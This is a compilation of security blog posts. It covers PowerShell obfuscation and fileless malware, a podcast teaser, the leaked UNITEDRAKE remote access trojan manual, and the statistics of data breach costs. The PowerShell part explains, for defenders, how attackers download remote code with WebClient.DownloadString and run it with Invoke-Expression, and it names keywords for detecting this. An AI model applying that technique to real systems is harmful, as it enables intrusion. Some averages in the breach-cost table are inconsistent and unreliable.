Yeah, PowerShell is incredibly flexible and the hackers are good at taking advantage of its features to create confusion.

You can also ponder this one, which uses environment variables in an old-fashioned Windows shell to hide the evil code and then pipe it into PowerShell:

You should keep in mind that in a PowerShell pipeline, each pipe segment runs as a separate process, which spews its own events for maximum log confusion. The goal in the above example is to use the %cmd% variable to hide the evil code.

However, from my Windows Event Viewer,  I was able to spot the full original command line — though it took some digging.

In theory, you could look for the actual malware signature, which in my example is  represented by “write-host evil malware”, within the Windows logs by scanning the command lines.

But hackers became very clever by making the malware signature itself invisible. That’s really the example I first started with.

The idea is to use the WebClient .Net object to read the malware that’s contained on a remote site and then execute it with PowerShell’s Invoke-Expression. In the Event Viewer, you can’t see the actual code!

This is known as fileless malware and has become very popular technique among the hackeratti. As I mentioned in the beginning, security pros can counteract this by looking instead for WebClient and Downloadstring in the command line. It’s just not a normal user command, at least in my book.

A Quick Peek at Invoke-Obfuscation

This is where Bohannon’s Invoke-Obfuscation tool comes into play. He spent a year exploring all kinds of PowerShell command line obfuscation techniques — and he’s got the beard to prove it! —to make it almost impossible to scan for obvious keywords.

His obfuscations are based on escape sequences and clever PowerShell programming to manipulate commands.

I loaded his Invoke-Expression app into my AWS server and tried it out for myself. We’ll explore more of this tool next time, but here’s what happened when I gave it the above Webclient.Downloadstring fileless command string:

Invoke-Obfuscation’s string obfuscation. Hard to search for malware signatures within this jumble.

Very confusing! And I was able to test the obfuscated PowerShell within his app.

Next time we’ll look at more of Invoke-Obfuscation’s powers and touch on new ways to spot these confusing, but highly dangerous, PowerShell scripts.

Continue reading the next post in "PowerShell Obfuscation"

[Podcast] Varonis Director of Cyber Security Ofer Shezaf, Part I

[Podcast] Varonis Director of Cyber Security Ofer Shezaf, Part I

This article is part of the series "[Podcast] Varonis Director of Cyber Security Ofer Shezaf". Check out the rest:

Leave a review for our podcast & we'll send you a pack of infosec cards.

A self-described all-around security guy, Ofer Shezaf is in charge of security standards for Varonis products. He has had a long career that includes most recently a stint at Hewlett-Packard, where he was a product manager for their SIEM software, known as ArcSight. Ofer is a graduate of Israel’s Technion University.

It’s always great to talk to Ofer on data security since his perspective is shaped by a 20-year career. He’s seen it all! In the first part of our interview, we learn how hackers have taken long-standing techniques such as SQL injection and built successful business models around their malware.

Can they be stopped? Ofer thinks we’ll first need to have new metrics and measurements describing the security of developed software. Click on the interview above to hear more about what he has to say.

Continue reading the next post in "[Podcast] Varonis Director of Cyber Security Ofer Shezaf"

More NSA Goodness: Shadow Brokers Release UNITEDRAKE

More NSA Goodness: Shadow Brokers Release UNITEDRAKE

Looking for some good data security news after the devastating Equifax breach? You won’t find it in this post, although this proposed federal breach notification law could count as a teeny ray of light. Anyway, you may recall the Shadow Brokers, which is the group that hacked the NSA servers, and published a vulnerability in Windows that made WannaCry ransomware so deadly.

Those very same Shadow Brokers have a new product announcement that also appears to be based on NSA spyware first identified in the Snowden documents. Bruce Schneier has more details on its origins.

(Way back in 2014, Cindy and I listened to Schneier speak at a cryptography conference, warning the attendees that NSA techniques would eventually reach ordinary hackers. Once again, Schneier proved depressingly right.)

Known as United Rake or UNITEDRAKE in hacker fontology, this is an advanced remote access trojan or RAT along with accompanying “implants” – NSA-speak for remote modules. It makes some of the admittedly simple RATs I investigated in my pen testing series look like the digital-version of Stone-Age tools.


How do we know how UNITEDRAKE works?

The Shadow Brokers kindly published a user’s manual. I highly recommend that IT folks who only know about malware by scanning the headlines of tech-zines peruse the contents of this document.

Forgetting for a moment that Evil Inc. is behind the malware, the 67-page manual appears on the surface to be describing a legit IT tool: there are sections on minimum software requirements, installation, deployment, and usage (lots of screenshots here).

Manage remote implants or modules from the UNITEDRAKE interface.

To my eyes, this is a detailed user’s manual that puts many business-class software collateral to shame. It’s the productized malware that we often hear about, and now we can all see for our itself. UNITEDRAKE will likely be sold on the dark web, and the manual is the teaser to get hackers interested.

I didn’t see all the capabilities explained that were implied in the screen shots, but there’s enough in the manual to convince the likely buyer that UNITEDRAKE is the real-deal and worth the investment

But It’s Still a Trojan

Once you read through the UNITEDRAKE manual, you see it’s essentially a RAT with a classic modern architecture: the client-side with the implants is on the victim’s computer, and it communicates to the hacker’s server on the other side of the connection.

Port 80 seems to be the communications channel, and that means HTTP is the workhorse protocol here —although raw TCP is mentioned as well.

In the RAT world, the client-side is the victim’s computer.

Scanning a few specialized websites, I learned that NSA implants such as Salvage Rabbit can copy data off a flash drive, Gumfish can take pictures from an embedded  camera, and Captivated Audience can — what else — spy on users through a laptop’s microphone. You can read more about this spy-craft in this Intercept article.

The NSA guys at least get credit for creative product naming.

The Prognosis

Obviously, the NSA was in a better position to install these implants than typical hackers. And it’s unclear how much of the NSA-ware the Shadow Brokers were able to implement.

In any case, with phishing and other techniques (SQL-injection, and say probing for known but unpatched vulnerabilities), hackers have had a good track record in the last few years in getting past the perimeter undetected.

Schneier also says that Kapersky has seen some of these implants in the wild.

My takeaway: We should be more than a little afraid of UNITEDRAKE, and other proven productized malware than hackers with some pocket change can easily get their hands on.

We never believed the perimeter was impenetrable! Learn how Varonis can spot attackers once they’re inside.

My Big Fat Data Breach Cost Post, Part I

My Big Fat Data Breach Cost Post, Part I

This article is part of the series "My Big Fat Data Breach Cost Series". Check out the rest:

Data breach costs are very expensive. No, wait they’re not. Over 60% of companies go bankrupt after a data breach! But probably not. What about reputational harm to a company? It could be over-hyped but after Equifax, it could also be significant. And aren’t credit card fraud costs for consumers a serious matter? Maybe not! Is this post starting to sound confusing?

When I was tasked with looking into data breach costs, I was already familiar with the great Verizon DBIR vs. Ponemon debate: based on data from 2014, Ponemon derived an average cost per record of $201 while Verizon pegged it at $.58 per record. In my book, that’s an enormous difference. But it can be explained if you dive deeper.

After looking at one too many research paper, presentation and blog post on the subject of data breach costs, I started to see that once you absorb a few underlying ideas, you understand what everyone is yakking about.

That’s a roundabout way of saying that this will be a multi-part series.

Averages Can Cause Non-Average Problems

The first issue to take up is the average of a data sample. In fact, this blog’s favorite statistician Kaiser Fung lectured us on this point a while back. When looking at a data set, a simple average of the numbers works well enough as long as the distribution of the number is not too skewed – has a spike or clump at the tail end.

But as Fung points out, when this is not the case, the average leads to inconsistencies, as in the following hypothetical data set of breach record counts over two years:

Company Number of records breached (2015) Number of records breached (2016 )
1 100 150
2 200 400
3 150 300
4 225 250
5 75 100
6 1000 1200
7 1500 1000
8 8000 1000
9 300 400
10 175 500
Average 1172 530

For 2015, the average of 1172 is off by several multiples for seven of the ten companies! And if we compare this average to the following year’s average of 930, we could incorrectly conclude that breach counts are down.

Why? If we look at those seven companies, we see all their breach counts went, ahem, up.

This usually leads to a discussion of how numbers are distributed in a dataset, and that the median number, where 50% or less of the data can be found, is a better representation than an average — especially for skewed data sets. Kaiser is very good at explaining this.

For those who want to get a head start on the next post in this series, they can scan this paper, which has the best title on a data security topic I’ve come across, Sex, Lies and Cyber-crime Surveys. This was written by those crazy folks at Microsoft. If you don’t want to read it, the point is this: for skewed data, it’s important to analyze how each percentile contributes to the overall average.

Guesstimating Data Breach Costs

How does Ponemon determine the cost of a data breach? Generally, this information is not easily available. However, in recent years, theses costs have started to show up in annual reports for public companies.

But for private companies and for public companies that are not breaking breach costs out in their public financial reporting, you have to do more creative number crunching.

Ponemon surveys companies, asking them to rate the costs for common post-breach activities, including auditing & consulting, legal services, and identity protection fees. Ponemon then categorizes costs into whether they’re direct — for example, credit monitoring — or fuzzier indirect or opportunity costs — extra employee time or potential lost business.

It turns out that these indirect costs represent about 40% of the average cost of a breach based on their 2015 survey. These costs mean something, but they’re not really accounting costs. More on that next time.

Recently, other researchers have been able to get a hold of far better estimate of the direct breach costs by examining actual cyber insurance claims. Companies, such as Advisen and NetDiligence, have this insurance payout data and have been willing to share it.

The cyber insurance market is still immature and the actual payouts after deductibles and other fine print don’t represent the full direct cost of the breach. But this is, for the first time, evidence of direct costs.

Anyway, the friendly people over at RAND — yes, the very same company who worked this out — used these data sets to guesstimate an average breach cost per incident of about $6 million – wonks should review their paper. This tracks very closely with Ponemon’s $6.5 million per incident estimate for roughly the same period.

Per incident cost data based on insurance claims. Note the Max values! (Source: RAND)

Before you start shouting into your browser, I realize I used an average above to estimate a very skewed (and as we’ll see heavy-tailed) set.

In any case, several studies including the RAND one, have focused on per incident costs rather than per record costs. At some point, the Verizon DBIR team also began to de-emphasize the count of records exposed, realizing that it’s hard to get reliable numbers from their own forensic data.

In the 2015 DBIR report, the one where they announced their provocative $.58 per record breach cost claims, the researchers relied on, for the first time, a dataset of insurance claim data from NetDiligence.

Let me just say that the DBIR’s average cost ratio is heavily influenced by a few companies with humongous breached record counts  — likely in the millions —  reflected in the denominator and smaller total insurance payouts for the numerator. As we saw in my made-up example above, the average in this case is not very revealing.

Why not use multiple averages customized over different breach count ranges? I hope you’re beginning to see it’s far better to segment the cost data by record count: you look up in a table to find the costs appropriate for your case. And Verizon did something close to that in the 2015 DBIR to come with a table of data that’s nearer Ponemon’s average for the lower tiers:

Ok, so maybe Verizon’s headline-grabbing $.58 per record breached is not very accurate.

Counting breach data record provides some insight into understanding total costs, but there are other factors: the particular industry the company is in, regulations they’re under, credit protection costs for consumers, and company size. For example, take a look at this breach cost calculator based on Ponemon’s own data.

Linear Thinking and Its Limits

You can understand why the average breach cost per record number is so popular: it provides a quick although unreliable answer for the total cost of a particular breach.

To derive the $201 average cost per record, Ponemon simply added up the costs (both direct and indirect) from their survey and divided by the number of records breached as reported by the companies.

This may be convenient for calculations but as a predictor, it’s not very good. I’m gently walking around the topic of linear regressions, which is one way to draw a “good” straight line through the dataset.

Wonks can check out Jay Jacobs’ great post on this in his Data Driven Security blog. He shows a linear regression beating out the simple Ponemon line with its slope of 201 — by the way, he gained direct access to Ponemon’s survey results. Jacobs’ beta is $103, which you can interpret as the marginal cost of an additional breached record. But even his regression model is not all that accurate.

I want to end this post with this thought: we want the world to look linear, but that’s not the way it ticks.

Why should breach costs go up by a fixed amount for each additional record stolen? And for that matter, why do we assume that 10% of the companies in a data breach survey will contribute 10% to the total costs, the next 10% will add another 10%, etc.

Sure for paying out credit monitoring costs for consumer and replacing credit cards that were reissued by litigious credit card companies, costs add up on a per record basis.

On the other hand, I don’t know too many attorneys, security consultants, developers, or pen testers who say to new clients, “We charge $50 a data record to analyze or remediate your breach.”

Jacobs found a better non-linear model — technically log-linear which is fancy way of saying the record count variable has an exponent in it. In the graph below — thank you Wolfram Alpha! — I compared the simple-minded Ponemon line against the more sophisticated model from Jacobs. You can gaze upon the divergence or else click here to explore on you own.

The great divergence: linear vs non-linear data breach cost estimates.

If you made it this far, congratulations!

In the next post, I hope all this background will payoff as I try to connect these ideas to come up with a more nuanced way to understand data breach costs.

Continue reading the next post in "My Big Fat Data Breach Cost Series"